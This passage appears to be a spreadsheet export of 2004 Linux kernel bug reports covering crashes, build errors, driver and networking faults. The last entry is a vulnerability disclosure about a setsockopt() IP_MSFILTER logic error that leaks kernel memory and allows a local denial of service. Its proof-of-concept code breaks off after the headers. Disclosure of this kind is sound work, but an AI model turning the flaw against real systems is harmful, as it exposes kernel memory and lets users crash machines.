Feb 7 00:35:56 heros kernel: bad: scheduling while atomic! Feb 7 00:35:56 heros kernel: Call Trace: Feb 7 00:35:56 heros kernel: [schedule+1393/1408] schedule+0x571/0x580 Feb 7 00:35:56 heros kernel: [__get_free_pages+31/80] __get_free_pages+0x1f/0x50 Feb 7 00:35:56 heros kernel: [schedule_timeout+181/192] schedule_timeout+0xb5/0xc0 Feb 7 00:35:56 heros kernel: [normal_poll+268/352] normal_poll+0x10c/0x160 Feb 7 00:35:56 heros kernel: [tty_poll+101/128] tty_poll+0x65/0x80 Feb 7 00:35:56 heros kernel: [do_select+399/720] do_select+0x18f/0x2d0 Feb 7 00:35:56 heros kernel: [__pollwait+0/208] __pollwait+0x0/0xd0 Feb 7 00:35:56 heros kernel: [sys_select+719/1264] sys_select+0x2cf/0x4f0 Feb 7 00:35:56 heros kernel: [syscall_call+7/11] syscall_call+0x7/0xb Feb 7 00:35:56 heros kernel: Feb 7 00:37:10 heros syslogd 1.4.1#10: restart.</t>
  </si>
  <si>
    <t>2.6.3-rc1</t>
  </si>
  <si>
    <t>APM support prevents the 2.6.2 kernel to be compiled</t>
  </si>
  <si>
    <t>2004-02-08 04:42 UTC</t>
  </si>
  <si>
    <t>Mindaugas Zaksauskas</t>
  </si>
  <si>
    <t>2004-07-24 08:52 UTC</t>
  </si>
  <si>
    <t>Distribution: Debian/unstable Hardware Environment: GenuineIntel / Intel(R) Celeron(R) CPU 1.70GHz Software Environment: mindas:/usr/src/linux# gcc --version gcc (GCC) 3.3.3 20040125 (prerelease) (Debian) mindas:/usr/src/linux# ld --version GNU ld version 2.14.90.0.7 20031029 Debian GNU/Linux Problem Description: If the APM support is included as a module, the compilation ends up with the following error: CHK include/linux/compile.h GEN .version CHK include/linux/compile.h UPD include/linux/compile.h CC init/version.o LD init/built-in.o LD .tmp_vmlinux1 arch/i386/kernel/built-in.o(__ksymtab+0x68): undefined reference to `machine_real_restart' make: *** [.tmp_vmlinux1] Error 1 Steps to reproduce: get the 2.6.2, make menuconfig, go for APM support and add all subitems of the APM tree. I tried to remove the APM support, and the compilation was completed successfully.</t>
  </si>
  <si>
    <t>kernel panic on boot</t>
  </si>
  <si>
    <t>2004-02-08 09:23 UTC</t>
  </si>
  <si>
    <t>oystein.olsen</t>
  </si>
  <si>
    <t>2004-12-07 04:01 UTC</t>
  </si>
  <si>
    <t>Distribution: Gentoo Hardware Environment: ASUS P4P800-VM mainboard, Intel Pentium 4 Software Environment: Problem Description: Kernel panic on boot Steps to reproduce: Booting the kernel Manually copied screen: ACPI: PCI Interrup Link [LNKE] (IRQs 3 4 *5 6 7 10 11 12 14 15) ACPI: PCI Interrup Link [LNKE] (IRQs 3 4 5 6 7 10 *11 12 14 15) ACPI: PCI Interrup Link [LNKE] (IRQs 3 4 5 6 7 *10 11 12 14 15) ACPI: PCI Interrup Link [LNKE] (IRQs 3 4 5 6 7 *10 11 12 14 15) Linux Plug and Play Support v0.97 (c) Adam Belay PnPBIOS: Scanning system for PnP BIOS support... PnPBIOS: Found PnP BIOS installation structure at 0xc00f63b0 PnPBIOS: PnP Bios Version 1.0, entry 0xf0000:0x6f9a, dseg 0xf0000 general protection fault: 0000 [#1] CPU: 0 EIP: 0098:[&lt;000022d0&gt;] Not tainted EFLAGS: 0010087 EIP is at 0x22d0 eax: 000022ec ebx: 0000005d ecx: 00010000 edx: 00000001 esi: 00001be0 edi: 00000015 ebp: dfed0000 esp: dfed5ed6 ds: 00b0 es: 00b0 ss: 0068 Process swapper (pid: 1, threadinfo=dfed4000 task=dfecf940) Stack: 000002ec 22ec2142 00000000 91bd0015 0006c893 00010001 5f28915c 0015c89a 5f280000 c8935f04 00060001 72590606 01060106 007b70b4 0246007b 00a00000 707000b0 00a87036 00010086 000b0000 00010090 00a80000 00b00000 00a00001 Call Trace: Code: Bad EIP value &lt;0&gt;Kernel panic: Attempted to kill init! The kernel panic also happens with 2.6.2. Sources downloaded from kernel.org. More info (.config, lspci -vvv) at http://folk.uio.no/oeysteio/tmp/ If you need more info or somebody to do some tests, please contact me. I experience no problems with kernel 2.4.x. The bios has been upgraded to the latest version.</t>
  </si>
  <si>
    <t>2.4.25-rc1</t>
  </si>
  <si>
    <t>Tim Savannah</t>
  </si>
  <si>
    <t>Back scroll on mouse wheel is interpreted as a right button click</t>
  </si>
  <si>
    <t>2004-02-08 22:26 UTC</t>
  </si>
  <si>
    <t>Peter Williams</t>
  </si>
  <si>
    <t>2008-09-24 07:16 UTC</t>
  </si>
  <si>
    <t>drivers_input-devices</t>
  </si>
  <si>
    <t>Distribution: RedHat 9.0 Hardware Environment: System 1: Mother Board: Gigabyte Pentium 4 Titan Series GA-8SRX CPU: Intel(R) Pentium(R) 4 CPU 2.00GHz System 2: Mother Board: Gigabyte Dual Pentium GA-6BXD CPUs: 2 x Intel(R) Celeron(r) 500MHz Mouse: Logitech Cordless Optical Mouse (M/N M-RR67A) KVM Switch: ATEN CS-14 Software Environment: RedHat 9.0 - fully updated Problem Description: A backward scroll on the mouse wheel is interpreted as a right button click. This problem has been present in all 2.6 kernels that I have tried since 2.6-test11 and is still present in 2.6.2. In addition to the hardware described above it has been observed on a single CPU machine at work using a different model Logitech cordless mouse directly attached to the system (i.e. no KVM switch). Depending on the type of window involved, the right button click is in addition to the reverse scroll behaviour. E.g. if I do a backward scroll in a Netscape window the page scrolls up AND whatever action is associated with a right button click on that page occurs, if I do a reverse scroll on the desktop the window associated a right click pops up, etc. As you can imagine, this behaviour can be quite disconcerting in editors (such as Eclipse) that make extensive use of the mouse interface with all sorts of unwanted events occuring when you try reverse scroll through the text. Steps to reproduce: Build, install and boot 2.6.2 version kernel.</t>
  </si>
  <si>
    <t>(net) Inability to boot &gt;=linux-2.6.2 due to initialization of eth devices</t>
  </si>
  <si>
    <t>since 2.6.2-vanilla final</t>
  </si>
  <si>
    <t>2004-02-10 06:01 UTC</t>
  </si>
  <si>
    <t>NeoNik</t>
  </si>
  <si>
    <t>2004-12-02 06:49 UTC</t>
  </si>
  <si>
    <t>Distribution: Gentoo Linux Hardware Environment: NETGEAR FA-311, uses the natsemi 10/100MBps module, Intel's 10/100/1000MBps (onboard). Software Environement: gcc (GCC) 3.3.2 20040119 (Gentoo Linux 3.3.2-r7, propolice-3.3-7) - same with gcc-3.4 20040204), 2.3.3_pre20040207 using NPTL instead of LinuxThreads, linux-2.6.2-rc2-mm1. Problem description: trying to boot the kernel it stalls at initialization of eth0/eth1. While eth0 in case the both appropriate eth0-iface modules are built into the kernel image, and eth1 if they both are compiled as modules. I believe waiting for about an hour for it to load is enough to claim it stalls. Furthermore, the cursors stops blinking immediately. Steps to reproduce: try to boot a 2.6.2-vanilla or 2.6.2-mm1 or later using the .config I hope I'll be able to attach along with the init script for eth interfaces (/etc/init.d/net.eth0).</t>
  </si>
  <si>
    <t>HTB filter on a 802.1q sub interface will drop all packets</t>
  </si>
  <si>
    <t>2004-02-11 05:19 UTC</t>
  </si>
  <si>
    <t>Hamid Hashemi</t>
  </si>
  <si>
    <t>2005-02-17 13:52 UTC</t>
  </si>
  <si>
    <t>Distribution: Fedora Core 1 Hardware Environment: Intel(R) Pentium(R) 4 CPU 1.60GHz 1GB of RAM 40GB of HDD 3c59x Network Card Software Environment: ip utility, iproute2-ss020116 iptables v1.2.9 Problem Description: I compiled the kernel 2.6.2 with 3c59x.c changing the MTU to 1504 for VLAN packet support . all things works great and dot1q sub interfaces going up and working propertly . I stored a qdisc on the eth0 ( Native VLAN ) for outgoing traffic and store another qdisc on eth0.3 ( Vlan ID 3 ) . when I store a filter and bandwidth limit on the eth0 ( native vlan ) it is working propertly and will drop the packet when the limit exceed . but on the eth0.3 it will drop all packet as soon as I store a filter on that device . it drops the packets however there is no limit exceeded !!! I checked same scenario with kernel 2.4.24 and all things working great . here is my tc rules : tc qdisc del dev eth0 root tc qdisc add dev eth0 root handle 1 htb default 0 tc qdisc del dev eth0.3 root tc qdisc add dev eth0.3 root handle 1 htb default 0 tc class add dev eth0 parent 1: classid 1:2 htb rate 200Kbit tc class add dev eth0 parent 1:2 classid 1:20 htb rate 200Kbit tc filter add dev eth0 parent 1:0 protocol ip prio 100 u32 match ip src 217.24.156.240/29 classid 1:20 tc class add dev eth0.3 parent 1: classid 1:2 htb rate 200Kbit tc class add dev eth0.3 parent 1:2 classid 1:20 htb rate 200Kbit tc filter add dev eth0.3 parent 1:0 protocol ip prio 100 u32 match ip dst 217.24.156.240/29 classid 1:20 and here is HTB stats after storing filters on the interfaces : ### eth0: queueing disciplines qdisc htb 1: r2q 10 default 0 direct_packets_stat 15 Sent 107896 bytes 1124 pkts (dropped 0, overlimits 0) ### eth0: traffic classes class htb 1:2 root rate 200Kbit ceil 200Kbit burst 1855b cburst 1855b Sent 106450 bytes 1109 pkts (dropped 0, overlimits 0) rate 2868bps 29pps lended: 0 borrowed: 0 giants: 0 tokens: 67584 ctokens: 67584 class htb 1:20 parent 1:2 prio 0 rate 200Kbit ceil 200Kbit burst 1855b cburst 1855b Sent 106450 bytes 1109 pkts (dropped 0, overlimits 0) rate 2868bps 29pps lended: 1109 borrowed: 0 giants: 0 tokens: 67584 ctokens: 67584 ### eth0: filtering rules filter parent 1: protocol ip pref 100 u32 filter parent 1: protocol ip pref 100 u32 fh 800: ht divisor 1 filter parent 1: protocol ip pref 100 u32 fh 800::800 order 2048 key ht 800 bkt 0 flowid 1:20 match d9189cf0/fffffff8 at 12 ### eth0.3: queueing disciplines qdisc htb 1: r2q 10 default 0 direct_packets_stat 3 Sent 198 bytes 3 pkts (dropped 1594, overlimits 0) ### eth0.3: traffic classes class htb 1:2 root rate 200Kbit ceil 200Kbit burst 1855b cburst 1855b Sent 0 bytes 0 pkts (dropped 0, overlimits 0) lended: 0 borrowed: 0 giants: 0 tokens: 74240 ctokens: 74240 class htb 1:20 parent 1:2 prio 0 rate 200Kbit ceil 200Kbit burst 1855b cburst 1855b Sent 0 bytes 0 pkts (dropped 1595, overlimits 0) lended: 0 borrowed: 0 giants: 0 tokens: 74240 ctokens: 74240 ### eth0.3: filtering rules filter parent 1: protocol ip pref 100 u32 filter parent 1: protocol ip pref 100 u32 fh 800: ht divisor 1 filter parent 1: protocol ip pref 100 u32 fh 800::800 order 2048 key ht 800 bkt 0 flowid 1:20 match d9189cf0/fffffff8 at 16 Steps to reproduce: Build and Install kernel 2.6.2 . create a 802.1q sub interface and create HTB qdisc on that . ( a class with max rate ). Then create a filter attached to that class and see all packets drops when there is no limit exceeded . let me know if you need more info . Hamid</t>
  </si>
  <si>
    <t>Alan Grimes</t>
  </si>
  <si>
    <t>io_other</t>
  </si>
  <si>
    <t>acpi ioapic nic etc don't work correctly on Arima W720-K8 (eMachines M6805/M6807)</t>
  </si>
  <si>
    <t>2.6.3-bk1</t>
  </si>
  <si>
    <t>2004-02-13 14:00 UTC</t>
  </si>
  <si>
    <t>Chris Cheney</t>
  </si>
  <si>
    <t>2004-05-27 23:30 UTC</t>
  </si>
  <si>
    <t>Distribution: Debian Sid Hardware Environment: Arima W720-K8/eMachines M6807 AMD64 Laptop Software Environment: Problem Description: I am unable to use acpi, ioapic, and my nic while under just acpi even. I don't think much of anything works when ioapic is enabled currently. Current kernels got around the ioapic part of the problem by just forcing it off. It would be nice if it is possible for me to fix the madt easily to just replace that like can be done with dsdt tables. Also the ioapic fix still doesn't allow the nic to work with acpi enabled. I am currently reading the ACPI docs so I can learn more about it so I will be less of a burden on the acpi developers. I have only finished reading the first 130 pages so far though. I have included the logs from acpidmp, biosdecode, dmidecode, and mptable. If you need anything else just let me know. BTW there is no way to reenable apic if its forced off "apic" at boot seems to be ignored afaict. Steps to reproduce: Buy a eMachines M6805/M6807. Install linux with acpi/ioapic/lapic enabled. ;)</t>
  </si>
  <si>
    <t>highmem problem using cryptoloop</t>
  </si>
  <si>
    <t>2004-02-13 19:32 UTC</t>
  </si>
  <si>
    <t>Michael Schnurbusch</t>
  </si>
  <si>
    <t>2004-06-20 21:30 UTC</t>
  </si>
  <si>
    <t>Distribution: Hardware Environment: Software Environment: Problem Description: Steps to reproduce: highmem (4GB or above) activated in .config losetup -e aes-256 /dev/loop0 /dev/hdd1 mkfs.ext2 /dev/loop0 ----&gt; the computer freezes or reboots when you have more than 768 MB of RAM (I have 1024 MB of RAM), this error does not appear, when highmem in Kernel is deactivated, then cryptoloop works without problems</t>
  </si>
  <si>
    <t>b1isa and t1isa compile problem</t>
  </si>
  <si>
    <t>2.6.3-rc2</t>
  </si>
  <si>
    <t>2004-02-14 02:55 UTC</t>
  </si>
  <si>
    <t>Udo</t>
  </si>
  <si>
    <t>2004-03-31 20:49 UTC</t>
  </si>
  <si>
    <t>drivers_isdn</t>
  </si>
  <si>
    <t>Distribution: Suse 8.1 Hardware Environment: AMD Athlon 2500 Software Environment: KDE 3.2.0 Problem Description: b1isa und t1isa do not compile on 2.6.3-rc2 (on 2.6.2) it is ok. Steps to reproduce: drivers/isdn/hardware/avm/b1isa.c: In function `b1isa_init': drivers/isdn/hardware/avm/b1isa.c:183: structure has no member named `irq_resource' make[4]: *** [drivers/isdn/hardware/avm/b1isa.o] Fehler 1 make[3]: *** [drivers/isdn/hardware/avm] Fehler 2 make[2]: *** [drivers/isdn/hardware] Fehler 2 make[1]: *** [drivers/isdn] Fehler 2 make: *** [drivers] Fehler 2 drivers/isdn/hardware/avm/t1isa.c: In function `t1isa_init': drivers/isdn/hardware/avm/t1isa.c:522: structure has no member named `irq_resource' make[4]: *** [drivers/isdn/hardware/avm/t1isa.o] Fehler 1 make[3]: *** [drivers/isdn/hardware/avm] Fehler 2 make[2]: *** [drivers/isdn/hardware] Fehler 2 make[1]: *** [drivers/isdn] Fehler 2 make: *** [drivers] Fehler 2</t>
  </si>
  <si>
    <t>nfsd_commit() fails when offset is ~4GB</t>
  </si>
  <si>
    <t>2004-02-14 07:51 UTC</t>
  </si>
  <si>
    <t>Jerzy Borkowski</t>
  </si>
  <si>
    <t>2004-04-02 17:30 UTC</t>
  </si>
  <si>
    <t>Distribution: gentoo Hardware Environment: 1xP4:2.8GHzHT/1GB RAM/e1000 card Software Environment: stock 2.6.2 kernel/gentoo compiled with gcc332 Problem Description: the off_t offset parameter in nfsd_commit() is not wide enough for the code below : fs/nfsd/vfs.c:831 if ((u64)count &gt; ~(u64)offset) return nfserr_inval; it should be changed to loff_t, u64 or similar (a 64bit value). As it is now, NFS3/NFS4 COMMIT operations fail whenever offset is around 4GB. Steps to reproduce: on Solaris/SPARC machine mount disk via NFS from Linux 2.6.x NFS3 server and type, say : dd if=/dev/zero of=/path_to_mounted_disk/bigfile bs=1000000 count=5000 after having written 4GB on the Linux NFS server, any further NFS COMMIT commands fail (run tcpdump |grep commit in another window to verify). As the side effect, this brings the Solaris machine to a halt (until nfsd on linux is stopped).</t>
  </si>
  <si>
    <t>USB: "invalid interface number "</t>
  </si>
  <si>
    <t>2.6.2-rc2</t>
  </si>
  <si>
    <t>2004-02-15 00:04 UTC</t>
  </si>
  <si>
    <t>Pieter Smit</t>
  </si>
  <si>
    <t>2004-11-12 12:51 UTC</t>
  </si>
  <si>
    <t>Distribution:Debian SID Hardware Environment:IBM A31 Laptop Software Environment:Compiled kernel for Kernel.org + HostAP patch Problem Description:Error in log when connection USB Senao Wireless LAN Adapter Steps to reproduce: Insert USB adapter. Message the same everytime it is inserted. Found one reference to similar problem, but with no resolution: http://www.mail-archive.com/debian-user@lists.debian.org/msg82153.html #From syslog when USB adapter inserted. Feb 15 08:39:15 peslaptop kernel: drivers/usb/host/uhci-hcd.c: 1820: wakeup_hc Feb 15 08:39:16 peslaptop kernel: hub 2-0:1.0: port 2, status 101, change 1, 12 Mb/s Feb 15 08:39:16 peslaptop kernel: hub 2-0:1.0: debounce: port 2: delay 100ms stable 4 status 0x101 Feb 15 08:39:16 peslaptop kernel: usb 2-2: new full speed USB device using address 2 Feb 15 08:39:16 peslaptop kernel: drivers/usb/core/config.c: invalid interface number (1/1) Feb 15 08:39:16 peslaptop kernel: usb 2-2: can't read configurations, error -22 Feb 15 08:39:16 peslaptop kernel: usb 2-2: new full speed USB device using address 3 Feb 15 08:39:16 peslaptop kernel: drivers/usb/core/config.c: invalid interface number (1/1) Feb 15 08:39:16 peslaptop kernel: usb 2-2: can't read configurations, error -22 ##When USB Adapter removed Feb 15 09:59:33 peslaptop kernel: hub 2-0:1.0: port 2, status 100, change 1, 12 Mb/s Feb 15 09:59:34 peslaptop kernel: drivers/usb/host/uhci-hcd.c: 1820: suspend_hc</t>
  </si>
  <si>
    <t>CD Recorder doesn't work properly with ide-cd</t>
  </si>
  <si>
    <t>2.6,2, 2.6.3-rc3</t>
  </si>
  <si>
    <t>2004-02-15 04:29 UTC</t>
  </si>
  <si>
    <t>Julien Langer</t>
  </si>
  <si>
    <t>2007-03-12 08:12 UTC</t>
  </si>
  <si>
    <t>Since 2.6.2 I get the following messages every time I load the ide-cd module: hdd: status error: status=0x59 { DriveReady SeekComplete DataRequest Error } hdd: status error: error=0x20LastFailedSense 0x02 hdd: drive not ready for command hdd: status error: status=0x58 { DriveReady SeekComplete DataRequest } hdd: status error: error=0x00 hdd: drive not ready for command hdd: status error: status=0x58 { DriveReady SeekComplete DataRequest } hdd: status error: error=0x00 hdd: drive not ready for command hdd: status error: status=0x58 { DriveReady SeekComplete DataRequest } hdd: status error: error=0x00 hdd: drive not ready for command hdd: ATAPI reset complete . . . hdd: ATAPI 40X CD-ROM CD-R/RW drive, 2048kB Cache These error messages are repeated ca 10 times Recording a CD puts very high load on the CPU, and gives many buffer underruns. It's impossible to write a CD without errors. 2.6.1 didn't have those problems. Here's my lscpi output: 00:00.0 Host bridge: VIA Technologies, Inc. VT8363/8365 [KT133/KM133] (rev 02) 00:01.0 PCI bridge: VIA Technologies, Inc. VT8363/8365 [KT133/KM133 AGP] 00:04.0 ISA bridge: VIA Technologies, Inc. VT82C686 [Apollo Super South] (rev 22) 00:04.1 IDE interface: VIA Technologies, Inc. VT82C586A/B/VT82C686/A/B/VT8233/A/C/VT8235 PIPC Bus Master IDE (rev 10) 00:04.2 USB Controller: VIA Technologies, Inc. USB (rev 10) 00:04.3 USB Controller: VIA Technologies, Inc. USB (rev 10) 00:04.4 Host bridge: VIA Technologies, Inc. VT82C686 [Apollo Super ACPI] (rev 30) 00:09.0 Ethernet controller: Realtek Semiconductor Co., Ltd. RTL-8139/8139C/8139C+ (rev 10) 00:0a.0 Multimedia audio controller: Creative Labs SB Live! EMU10k1 (rev 06) 00:0a.1 Input device controller: Creative Labs SB Live! MIDI/Game Port (rev 06) 00:11.0 Unknown mass storage controller: Promise Technology, Inc. 20265 (rev 02) 01:00.0 VGA compatible controller: nVidia Corporation NV11 [GeForce2 MX/MX 400] (rev a1) my CD Recorder: hdparm -i /dev/hdd /dev/hdd: Model=AOPEN CD-RW CRW2040, FwRev=1.27, SerialNo= Config={ Fixed Removeable DTR&lt;=5Mbs DTR&gt;10Mbs nonMagnetic } RawCHS=0/0/0, TrkSize=0, SectSize=0, ECCbytes=0 BuffType=unknown, BuffSize=0kB, MaxMultSect=0 (maybe): CurCHS=0/0/0, CurSects=0, LBA=yes, LBAsects=0 IORDY=on/off, tPIO={min:240,w/IORDY:120}, tDMA={min:120,rec:120} PIO modes: pio0 pio1 pio2 pio3 pio4 DMA modes: sdma0 sdma1 sdma2 mdma0 mdma1 *mdma2 AdvancedPM=no</t>
  </si>
  <si>
    <t>poweroff regression @ hwsleep 1.21 - ACPICA 20031203</t>
  </si>
  <si>
    <t>2004-02-15 05:30 UTC</t>
  </si>
  <si>
    <t>Ortwin Glück</t>
  </si>
  <si>
    <t>2004-11-04 15:52 UTC</t>
  </si>
  <si>
    <t>Distribution: Gentoo (with kernel from kernel.org) Hardware Environment: 0000:00:00.0 Host bridge: ALi Corporation M1671 Super P4 Northbridge [AGP4X,PCI and SDR/DDR] (rev 02) 0000:00:01.0 PCI bridge: ALi Corporation PCI to AGP Controller 0000:00:06.0 Multimedia audio controller: ALi Corporation M5451 PCI AC-Link Controller Audio Device (rev 02) 0000:00:07.0 ISA bridge: ALi Corporation M1533 PCI to ISA Bridge [Aladdin IV] 0000:00:08.0 Modem: ALi Corporation Intel 537 [M5457 AC-Link Modem] 0000:00:0a.0 Ethernet controller: Realtek Semiconductor Co., Ltd. RTL-8139/8139C/8139C+ (rev 10) 0000:00:0b.0 FireWire (IEEE 1394): VIA Technologies, Inc. IEEE 1394 Host Controller (rev 46) 0000:00:0f.0 USB Controller: ALi Corporation USB 1.1 Controller (rev 03) 0000:00:10.0 IDE interface: ALi Corporation M5229 IDE (rev c4) 0000:00:11.0 Bridge: ALi Corporation M7101 PMU 0000:00:13.0 CardBus bridge: O2 Micro, Inc. OZ6933 Cardbus Controller (rev 02) 0000:00:13.1 CardBus bridge: O2 Micro, Inc. OZ6933 Cardbus Controller (rev 02) 0000:00:14.0 USB Controller: ALi Corporation USB 1.1 Controller (rev 03) 0000:01:00.0 VGA compatible controller: nVidia Corporation NV11 [GeForce2 Go] (rev b2) 0000:02:00.0 Network controller: Harris Semiconductor D-Links DWL-g650 A1 (rev 01) Problem Description: Power off works with 2.6.1 but not with 2.6.2 anymore. Probably due to changes in drivers/acpi/hardware/hwsleep.c</t>
  </si>
  <si>
    <t>centrino cpufreq does not support showing the available frequencies</t>
  </si>
  <si>
    <t>2004-02-15 08:34 UTC</t>
  </si>
  <si>
    <t>Hanno Boeck</t>
  </si>
  <si>
    <t>2004-04-14 11:35 UTC</t>
  </si>
  <si>
    <t>In the old acpi-speedstep-interface, there was a way to see which frequencies a processor supports. With the new cpufreq-sysfs-interface, this is no longer possible for the centrino-driver. I saw that the p4_clockmod-driver provides a sysfs-file showing all available freqs, this needs to be implemented in the centrino-driver as well.</t>
  </si>
  <si>
    <t>Bug in usbnet driver with CDC Ethernet cable modem if you dual-boot with windows 2000/XP</t>
  </si>
  <si>
    <t>linux-2.6.2-mm1</t>
  </si>
  <si>
    <t>2004-02-15 14:22 UTC</t>
  </si>
  <si>
    <t>Chetan Chauhan</t>
  </si>
  <si>
    <t>2004-02-18 09:30 UTC</t>
  </si>
  <si>
    <t>Distribution: Gentoo linux (mm-sources 2.6.2) Hardware Environment: Intel 815, P3 Celeron 850 Software Environment: Normal install Problem Description: I have a motorola SB4200 USB Modem that used to work fine in 2.6.0-test9 and 2.4.20 with the USB CDCEther driver. In 2.6.2 i use the Multi-puropose USB Networking framework -&gt; CONFIG_USB_CDCETHER The modem is detected fine at startup with it coming up as :- eth1: register usbnet at usb-0000:00:1f.2-2, CDC Ethernet Device on bootup Howver the modem refuses to recieve/send data even though i do "ifconfig eth1 up" . It works only if i off the modem , on it again and wait for it to redetect. Then i have to "ifconfig eth1 up" and it works fine. Steps to reproduce: Use 2.6.2-mmsources CDCEther driver (compiled into kernel for me). use motorola sb 4200 USB modem. net will not work even though device is detected. Possible reason could be that i dual-boot linux and windows 2000. But it used to work fine with kernel 2.4.20 and 2.6.0-test9</t>
  </si>
  <si>
    <t>ip_conntrack crashing box</t>
  </si>
  <si>
    <t>2004-02-16 03:10 UTC</t>
  </si>
  <si>
    <t>Reuben Farrelly</t>
  </si>
  <si>
    <t>2005-02-22 09:33 UTC</t>
  </si>
  <si>
    <t>Distribution: Fedora Core 2 (rawhide) Hardware Environment: PIII/i386, Intel 82559 Software Environment: Kernel 2.6.3-rc2, kernel 2.6.2-rc*-mm* Problem Description: System crashes occasionally - possibly Netfilter related Steps to reproduce: Unable to consistently reproduce but this one but has been triggered a number of times (every few days on a lightly loaded box) Before the crash a few of these messages appear in syslog: Feb 7 14:15:45 tornado kernel: BUG: dst underflow 0: c0285254 Feb 7 14:15:45 tornado kernel: Attempt to release alive inet socket dfd89780 Feb 7 14:15:51 tornado kernel: BUG: dst underflow -1: c0285254 Feb 7 14:16:03 tornado kernel: Attempt to release alive inet socket dfd89780 Feb 7 14:16:03 tornado kernel: Attempt to release alive inet socket dfd89780 Feb 7 14:16:03 tornado kernel: BUG: dst underflow 0: c02c3e4b Feb 7 14:16:03 tornado kernel: BUG: dst underflow -1: c0285254 Feb 7 14:16:03 tornado kernel: Attempt to release alive inet socket dfd89780 Feb 7 14:16:03 tornado kernel: Attempt to release alive inet socket dfd89780 Feb 7 14:16:03 tornado kernel: BUG: dst underflow 0: c0285254 Feb 7 14:16:03 tornado kernel: Attempt to release alive inet socket dfd89780 Feb 7 14:16:03 tornado kernel: BUG: dst underflow -1: c0285254 Feb 7 14:16:03 tornado kernel: BUG: dst underflow -2: c0285254 When the box dies, the trace looks like this: Call Trace: death_by_timeout+0x0/0xe0 [ip_conntrack] death_by_timeout+0x78/0xe0 [ip_conntrack] run_timer_softirq+0xce/0x1c0 do_softirq+0x51/0xa0 do_IRQ+0x16a/0x1c0 common_interrupt+0x18/0??? acpi_processor_idle+0????? [processor] A full image of the screen is at http://www.reub.net/kernel/P2070023.JPG</t>
  </si>
  <si>
    <t>numbersign (#) key does not work with USB keyboards because it has a wrong keycode</t>
  </si>
  <si>
    <t>2004-02-16 12:08 UTC</t>
  </si>
  <si>
    <t>Max</t>
  </si>
  <si>
    <t>2004-02-16 23:23 UTC</t>
  </si>
  <si>
    <t>Distribution: Slackware 9.1 Hardware Environment: "Logitech Cordless Desktop Deluxe" USB keyboard and another unknown brand of USB keyboard Software Environment: Kernel 2.6.1 Gnu C 3.2.3 Linux C Library 2.3.2 Dynamic linker (ldd) 2.3.2 Linux C++ Library 5.0.3 Kbd 1.08 Modules Loaded bsd_comp ppp_deflate zlib_deflate zlib_inflate ppp_async ppp_generic slhc snd_via82xx snd_pcm snd_timer snd_ac97_codec snd_page_alloc snd_mpu401_uart snd_rawmidi snd_seq_device snd soundcore sd_mod usb_storage scsi_mod ehci_hcd uhci_hcd vfat fat isofs prism54 rtc Keymap is de-latin1-nodeadkeys.map (other maps are untested because I dont know where the numbersign key is on US or other keyboards). Problem Description: When I press the # (numbersign) key nothing happens (both in the console and in X). xev shows that the numbersign key has the same keycode as the "Print" key! This is what xev shows when I press the numbersign key: KeyPress event, serial 24, synthetic NO, window 0x1000001, root 0x38, subw 0x0, time 3399407, (204,398), root:(350,561), state 0x0, keycode 111 (keysym 0xff61, Print), same_screen YES, XLookupString gives 0 bytes: "" KeyRelease event, serial 24, synthetic NO, window 0x1000001, root 0x38, subw 0x0, time 3399503, (204,398), root:(350,561), state 0x0, keycode 111 (keysym 0xff61, Print), same_screen YES, XLookupString gives 0 bytes: "" This has been tested with a "Logitech Cordless Desktop Deluxe" and another unknown brand of USB keyboard. Steps to reproduce: Plug in a Logitech Cordless Desktop Deluxe (or probably other USB keyboard too) with kernel 2.6.1 and try to use the numbersign key (with german key mappings or maybe with others as well)! A fix for this problem would be great because it makes writing headers and comments in shell scripts much easier! thanks, Max</t>
  </si>
  <si>
    <t>Bernd Zeimetz</t>
  </si>
  <si>
    <t>(net r8169) Hard lock due to r8169 gigabit ethernet</t>
  </si>
  <si>
    <t>2004-02-17 02:58 UTC</t>
  </si>
  <si>
    <t>brandyn</t>
  </si>
  <si>
    <t>2004-03-28 11:01 UTC</t>
  </si>
  <si>
    <t>Distribution: Debian unstable/testing Hardware Environment: Athlon 1GHz, Gigabyte N400 Pro using integrated gigabit ethernet Software Environment: Samba 3.0.2, raid 5 &amp; 0 Problem Description: System hard locks due to r8169 gigabit ethernet. No kernel panic, no error. Nothing reported in logs. Network is dead. only blinking curser in console, but doesn't respond to input. I stripped down kernel to almost just essentials and still having hard locks. Steps to reproduce: All i have to do is browse the server via samba from a windows client for a little while. It's very random but happens fairly quickly if i go in and out of directories really quickly. I also tried this on a non raid partition and still have the same problem. I installed a 3C905 network card and cannot reporduce the problem.</t>
  </si>
  <si>
    <t>Alasdair G Kergon</t>
  </si>
  <si>
    <t>sync acpi generic code between ia64 tree and acpi tree</t>
  </si>
  <si>
    <t>2004-02-18 01:34 UTC</t>
  </si>
  <si>
    <t>2004-05-11 23:23 UTC</t>
  </si>
  <si>
    <t>There are some patch about generic ACPI code which are in IA64 tree , but missing form ACPI tree.</t>
  </si>
  <si>
    <t>Wrong usage of ACPI_DEBUG_PRINT causes compile time error</t>
  </si>
  <si>
    <t>2004-02-18 01:49 UTC</t>
  </si>
  <si>
    <t>2004-04-14 00:15 UTC</t>
  </si>
  <si>
    <t>In numa.c , some acpi debug macro are misused.</t>
  </si>
  <si>
    <t>setsockopt() syscall IP_MSFILTER option logic error leads to leaking kernel memory information</t>
  </si>
  <si>
    <t>2.6.3</t>
  </si>
  <si>
    <t>2004-02-18 08:50 UTC</t>
  </si>
  <si>
    <t>hsj</t>
  </si>
  <si>
    <t>2004-09-21 09:23 UTC</t>
  </si>
  <si>
    <t>Problem Description: this is a security vulnerability. setsockopt() syscall IP_MSFILTER option will leak kernel memory information because of logic error. imsf_numsrc member of struct ip_msfilter is data submitted by the user. when setsockopt()'s optlen is smaller than IP_MSFILTER_SIZE(imsf_numsrc), kernel will copy unnecessary data (line 1871 of net/ipv4/igmp.c). this data is acquirable using getsockopt() syscall with IP_MSFILTER option. PS1: each macro of IP_MSFILTER_SIZE, IP_SFLSIZE, and GROUP_FILTER_SIZE awakes integer overflow, when the value given by the user is used as it was. # IP_MSFILTER option, MCAST_MSFILTER option this leads to the ability of a local user to crash a kernel (DoS). PS2: ipv6 setsockopt() MCAST_MSFILTER option also has the same problem. Steps to reproduce: // this is a sample code. ---------------------------------------------------------------------- #include &lt;unistd.h&gt; #include &lt;stdio.h&gt; #include &lt;string.h&gt; #include &lt;ctype.h&gt; #include &lt;sys/socket.h&gt; #include &lt;netinet/in.h&gt; #include &lt;sys/socket.h&gt; #include &lt;arpa/inet.h&gt; #define MCAST_INCLUDE 1 #define IP_MSFILTER 41 struct ip_msfilter { unsigned int 